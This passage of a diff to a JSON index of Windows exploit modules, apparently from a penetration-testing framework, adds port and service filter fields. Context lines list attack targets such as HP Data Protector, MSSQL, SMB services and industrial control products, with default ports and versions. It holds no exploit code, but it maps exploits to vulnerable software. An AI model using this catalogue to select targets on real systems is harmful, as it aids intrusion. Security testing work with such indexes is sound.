+116926,12 @@ "platform": "Windows", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / HP LoadRunner 11.50" ], @@ -90493,6 +116967,12 @@ "platform": "Windows", "arch": "", "rport": 54345, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows (Dropper)" ], @@ -90527,6 +117007,12 @@ "platform": "Windows", "arch": "", "rport": 23472, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Diagnostics Server 9.10" ], @@ -90563,6 +117049,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Targeting", "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", @@ -90603,6 +117095,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Targeting", "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", @@ -90640,6 +117138,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector A.06.10 Build 611 / A.06.11 Build 243" ], @@ -90679,6 +117183,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008" ], @@ -90714,6 +117224,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Operations Agent 11.00 / Windows XP SP3", "HP Operations Agent 11.00 / Windows 2003 SP2" @@ -90750,6 +117266,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Operations Agent 11.00 / Windows XP SP3", "HP Operations Agent 11.00 / Windows 2003 SP2" @@ -90784,6 +117306,12 @@ "platform": "Windows", "arch": "", "rport": 5051, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Advanced Server All English" ], @@ -90815,6 +117343,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Powershell x86", "Powershell x64" @@ -90851,6 +117385,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Borland InterBase WI-V8.1.0.257", @@ -90896,6 +117436,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Borland InterBase WI-V8.1.0.257", @@ -90941,6 +117487,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Borland InterBase WI-V8.1.0.257", @@ -90987,6 +117539,12 @@ "platform": "Windows", "arch": "", "rport": 5498, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM Cognos Express 9.5 / Windows XP SP3" ], @@ -91025,6 +117583,21 @@ "platform": "Windows", "arch": "", "rport": 6988, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "IBM System Director Agent 5.20.3 / Windows with WebClient enabled" ], @@ -91057,6 +117630,12 @@ "platform": "Windows", "arch": "", "rport": 1582, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM Tivoli Storage Manager Express 5.3.6.2" ], @@ -91090,6 +117669,12 @@ "platform": "Windows", "arch": "", "rport": 1582, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM Tivoli Storage Manager Express 5.3.6.2" ], @@ -91124,6 +117709,21 @@ "platform": "Windows", "arch": "", "rport": "8880", + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "IBM WebSphere 7.0.0.0" ], @@ -91158,6 +117758,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3", "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3", @@ -91194,6 +117800,12 @@ "platform": "Windows", "arch": "", "rport": 65535, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Alerting Proxy 2000/2003/XP", "Alerting Proxy 2003 SP1-2 (NX support)", @@ -91228,6 +117840,12 @@ "platform": "Windows", "arch": "x86", "rport": 8001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2", "Lianja SQL 1.0.0RC5.1 / Windows XP SP3" @@ -91262,6 +117880,21 @@ "platform": "Windows", "arch": "x86", "rport": 8400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1" ], @@ -91295,6 +117928,12 @@ "platform": "Windows", "arch": "", "rport": 105, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP0/SP1 English", "Windows 2000 Pro English ALL" @@ -91330,6 +117969,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 ENG", "Windows XP SP2 ENG" @@ -91365,6 +118010,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -91399,6 +118050,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English" ], @@ -91436,6 +118093,21 @@ "platform": "Windows", "arch": "", "rport": 8082, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Microsoft Office SharePoint Server 2007 SP2 / Microsoft Windows Server 2003 SP2" ], @@ -91470,6 +118142,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal nc.exe" ], @@ -91504,6 +118182,12 @@ "platform": "Windows", "arch": "", "rport": 22222, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -91538,6 +118222,12 @@ "platform": "Windows", "arch": "", "rport": 7414, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64" ], @@ -91569,6 +118259,12 @@ "platform": "Windows", "arch": "", "rport": 13579, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "PlugX Type I (old)", "PlugX Type I", @@ -91602,6 +118298,12 @@ "platform": "Windows", "arch": "", "rport": 3460, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Poison Ivy 2.1.4 on Windows XP SP3" ], @@ -91639,6 +118341,12 @@ "platform": "Windows", "arch": "", "rport": 3460, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1", "Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1", @@ -91674,6 +118382,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "POP Peeper v3.4" ], @@ -91707,6 +118421,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "POP Peeper v3.4" ], @@ -91740,6 +118460,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Realtek Media Player(RtlRack) A4.06 (XP Pro All English)" ], @@ -91774,6 +118500,12 @@ "platform": "Windows", "arch": "", "rport": 30000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Sap Business One 2005 B1 Universal" ], @@ -91811,6 +118543,12 @@ "platform": "Windows", "arch": "", "rport": 3200, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SAP Netweaver 7.0 EHP2 SP6 / Windows XP SP3", "SAP Netweaver 7.0 EHP2 SP6 / Windows 2003 SP2" @@ -91845,6 +118583,12 @@ "platform": "Windows", "arch": "", "rport": 2000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ShixxNOTE 6.net Universal" ], @@ -91879,6 +118623,12 @@ "platform": "Windows", "arch": "", "rport": 30000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)", @@ -91914,6 +118664,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2/XP3" ], @@ -91950,6 +118706,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "StreamDown 6.8.0" ], @@ -91983,6 +118745,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 English" ], @@ -92016,6 +118784,12 @@ "platform": "Windows", "arch": "", "rport": 113, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 Server SP4 English", @@ -92052,6 +118826,12 @@ "platform": "Windows", "arch": "", "rport": 20101, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 Server SP2 (DEP Bypass)" ], @@ -92085,6 +118865,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Universal" ], @@ -92118,6 +118904,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64", "Windows x86" @@ -92152,6 +118944,12 @@ "platform": "Windows", "arch": "", "rport": 514, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 SP1 English", "Windows XP Pro SP2 English", @@ -92189,6 +118987,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Wireshark 1.6.1 or less" ], @@ -92226,6 +119030,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Win32 Universal (Generic DEP & ASLR Bypass)" ], @@ -92260,6 +119070,12 @@ "platform": "Windows", "arch": "", "rport": 1755, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English" ], @@ -92292,6 +119108,12 @@ "platform": "Windows", "arch": "", "rport": 407, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -92324,6 +119146,20 @@ "platform": "Windows", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "Automatic" ], @@ -92358,6 +119194,20 @@ "platform": "Windows", "arch": "", "rport": 1434, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "MSSQL 2000 / MSDE <= SP2" ], @@ -92392,6 +119242,20 @@ "platform": "Windows", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "MSSQL 2000 / MSDE <= SP2" ], @@ -92427,6 +119291,20 @@ "platform": "Windows", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "Automatic", "MSSQL 2000 / MSDE SP0 (8.00.194)", @@ -92473,6 +119351,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "MSSQL 2000 / MSDE SP0 (8.00.194)", @@ -92515,6 +119408,20 @@ "platform": "Windows", "arch": "x86, x64", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "Automatic" ], @@ -92549,6 +119456,20 @@ "platform": "Windows", "arch": "x86, x64", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "Automatic" ], @@ -92586,6 +119507,20 @@ "platform": "Windows", "arch": "x86, x64", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "Automatic" ], @@ -92625,6 +119560,21 @@ "platform": "Windows", "arch": "x86, x64", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -92660,6 +119610,12 @@ "platform": "Windows", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MySQL on Windows prior to Vista" ], @@ -92695,6 +119651,12 @@ "platform": "Windows", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MySQL on Windows" ], @@ -92728,6 +119690,12 @@ "platform": "Windows", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MySQL 5.0.45-community-nt", "MySQL 5.1.22-rc-community" @@ -92766,6 +119734,21 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older" ], @@ -92800,6 +119783,12 @@ "platform": "Windows", "arch": "", "rport": 2049, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English" ], @@ -92834,6 +119823,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 English SP0-SP4", "Windows XP English SP0/SP1" @@ -92868,6 +119863,21 @@ "platform": "Windows", "arch": "", "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -92902,6 +119912,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell GroupWise Messenger 2.0 Client", "Novell GroupWise Messenger 1.0 Client" @@ -92938,6 +119954,21 @@ "platform": "Windows", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1" ], @@ -92971,6 +120002,12 @@ "platform": "Windows", "arch": "", "rport": 689, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English" ], @@ -93004,6 +120041,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent" ], @@ -93040,6 +120083,12 @@ "platform": "Windows", "arch": "", "rport": 998, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" ], @@ -93075,6 +120124,12 @@ "platform": "Windows", "arch": "", "rport": 998, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" @@ -93111,6 +120166,12 @@ "platform": "Windows", "arch": "", "rport": 998, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" ], @@ -93146,6 +120207,12 @@ "platform": "Windows", "arch": "", "rport": 998, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" @@ -93183,6 +120250,21 @@ "platform": "Windows", "arch": "", "rport": 1158, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle Oracle11g 11.2.0.1.0 / Windows 2003 SP2" ], @@ -93216,6 +120298,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic" ], @@ -93249,6 +120339,12 @@ "platform": "Windows", "arch": "", "rport": 10000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)" ], @@ -93282,6 +120378,12 @@ "platform": "Windows", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" @@ -93319,6 +120421,12 @@ "platform": "Windows", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Oracle 10.2.0.1.0 Enterprise Edition", @@ -93355,6 +120463,12 @@ "platform": "Windows", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" @@ -93389,6 +120503,12 @@ "platform": "Windows", "arch": "", "rport": 110, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT/2000/XP/2003 (SLMail 5.5)" ], @@ -93421,6 +120541,12 @@ "platform": "Windows", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": [ "Windows x86", "Windows x64" @@ -93456,6 +120582,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "WinProxy <= 6.1 R1a Universal" ], @@ -93490,6 +120622,12 @@ "platform": "Windows", "arch": "x86", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 Pro All - English", @@ -93528,6 +120666,12 @@ "platform": "Windows", "arch": "", "rport": 3128, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Proxy-Pro GateKeeper 4.7" ], @@ -93561,6 +120705,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "WinGate 6.1.1.1077" ], @@ -93595,6 +120745,12 @@ "platform": "Windows", "arch": "x86", "rport": 12221, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ABB MicroSCADA Pro SYS600 9.3" ], @@ -93630,6 +120786,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Advantech WebAccess 8.0" ], @@ -93663,6 +120834,12 @@ "platform": "Windows", "arch": "", "rport": 4592, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31" ], @@ -93700,6 +120877,12 @@ "platform": "Windows", "arch": "", "rport": 20222, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Citect32.exe v5.21 NT4", @@ -93747,6 +120930,12 @@ "platform": "Windows", "arch": "", "rport": 1211, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal S3 CoDeSyS < 2.3.9.27" ], @@ -93787,6 +120976,12 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "CoDeSys v2.3 on Windows XP SP3", @@ -93824,6 +121019,12 @@ "platform": "Windows", "arch": "", "rport": 20034, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "DAQFactory Pro 5.85 Build 1853 on Windows XP SP3" ], @@ -93858,6 +121059,12 @@ "platform": "Windows", "arch": "", "rport": 7580, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3", @@ -93895,6 +121102,12 @@ "platform": "Windows", "arch": "", "rport": 7579, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "FactoryLink 7.5", @@ -93933,6 +121146,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)" ], @@ -93968,6 +121196,12 @@ "platform": "Windows", "arch": "", "rport": 38080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP" ], @@ -94005,6 +121239,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6/7/8 on Windows XP SP3", @@ -94044,6 +121284,12 @@ "platform": "Windows", "arch": "", "rport": 12401, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)" ], @@ -94079,6 +121325,12 @@ "platform": "Windows", "arch": "", "rport": 12401, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3", @@ -94119,6 +121371,12 @@ "platform": "Windows", "arch": "", "rport": 0, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP", @@ -94156,6 +121414,12 @@ "platform": "Windows", "arch": "cmd", "rport": 12397, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -94191,6 +121455,12 @@ "platform": "Windows", "arch": "", "rport": 4322, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP / 2003" ], @@ -94226,6 +121496,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MOXA MDM Tool 2.1" ], @@ -94260,6 +121536,12 @@ "platform": "Windows", "arch": "", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 - No dep bypass" ], @@ -94293,6 +121575,12 @@ "platform": "Windows", "arch": "", "rport": 910, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94329,6 +121617,12 @@ "platform": "Windows", "arch": "", "rport": 910, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94366,6 +121660,12 @@ "platform": "Windows", "arch": "", "rport": 910, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94401,6 +121701,12 @@ "platform": "Windows", "arch": "", "rport": 912, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94436,6 +121742,12 @@ "platform": "Windows", "arch": "", "rport": 912, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94469,6 +121781,12 @@ "platform": "Windows", "arch": "", "rport": 912, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94507,6 +121825,12 @@ "platform": "Windows", "arch": "", "rport": 11234, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -94542,6 +121866,12 @@ "platform": "Windows", "arch": "", "rport": 2001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -94577,6 +121907,12 @@ "platform": "Windows", "arch": "", "rport": 46823, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Winlog Lite 2.07.00" ], @@ -94613,6 +121949,12 @@ "platform": "Windows", "arch": "", "rport": 46824, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project", "Sielco Sistemi Winlog 2.07.14 - Automatic Washing System Project" @@ -94648,6 +121990,12 @@ "platform": "Windows", "arch": "", "rport": 20111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3" ], @@ -94682,6 +122030,12 @@ "platform": "Windows", "arch": "", "rport": 34205, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" ], @@ -94717,6 +122071,12 @@ "platform": "Windows", "arch": "", "rport": 20010, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3" ], @@ -94751,6 +122111,12 @@ "platform": "Windows", "arch": "", "rport": 20171, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" ], @@ -94784,6 +122150,12 @@ "platform": "Windows", "arch": "", "rport": 5061, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "AIM Triton 1.0.4 Universal" ], @@ -94817,6 +122189,12 @@ "platform": "Windows", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "sipXezPhone 0.35a Universal" ], @@ -94850,6 +122228,12 @@ "platform": "Windows", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SIPfoundry sipXphone 2.6.0.27 Universal" ], @@ -94881,6 +122265,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -94915,6 +122305,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -94951,6 +122347,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows x32", "Windows x64" @@ -94986,6 +122390,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows XP SP0/SP1" ], @@ -95020,6 +122432,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2000 SP2-SP4 + Windows XP SP0-SP1" ], @@ -95054,6 +122474,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic Targetting", "Windows 2000 English", @@ -95090,6 +122518,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2000 SP4" ], @@ -95125,6 +122561,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2000 SP0-SP4", 